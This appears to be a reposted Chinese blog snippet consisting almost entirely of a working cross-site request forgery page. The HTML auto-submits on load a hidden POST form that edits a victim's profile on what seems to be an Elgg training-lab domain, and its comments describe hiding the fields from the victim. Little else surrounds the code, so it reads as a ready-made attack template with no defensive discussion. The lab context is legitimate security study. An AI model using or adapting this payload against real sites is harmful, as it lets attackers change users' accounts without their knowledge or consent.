CSRF模拟post请求

来源:互联网 发布:迫击炮升级数据 编辑:程序博客网 时间:2024/06/04 23:35

隐藏发送post请求:

<html><body><h1>This page forges an HTTP POST request.</h1><script type="text/javascript">function post(url,fields){//create a <form> element.var p = document.createElement("form");//construct the formp.action = url;p.innerHTML = fields;p.target = "_self";p.method = "post";//append the form to the current page.document.body.appendChild(p);//submit the formp.submit();}function csrf_hack(){var fields;// The following are form entries that need to be filled out// by attackers. The entries are made hidden, so the victim// won't be able to see them.fields += "<input type='hidden' name='name' value='Alice'>";fields += "<input type='hidden' name='description' value='aaaaaaaaaa'>";fields += "<input type='hidden' name='accesslevel[description]'value='2'>";fields += "<input type='hidden' name='briefdescription' value=''>";fields += "<input type='hidden' name='accesslevel[briefdescription]' value='2'>";fields += "<input type='hidden' name='location' value=''>";fields += "<input type='hidden' name='accesslevel[location]' value='2'>";fields += "<input type='hidden' name='guid' value='39'>";var url = "http://www.csrflabelgg.com/action/profile/edit";post(url,fields);}// invoke csrf_hack() after the page is loaded.window.onload = function() { csrf_hack();}</script></body></html>


0 0
原创粉丝点击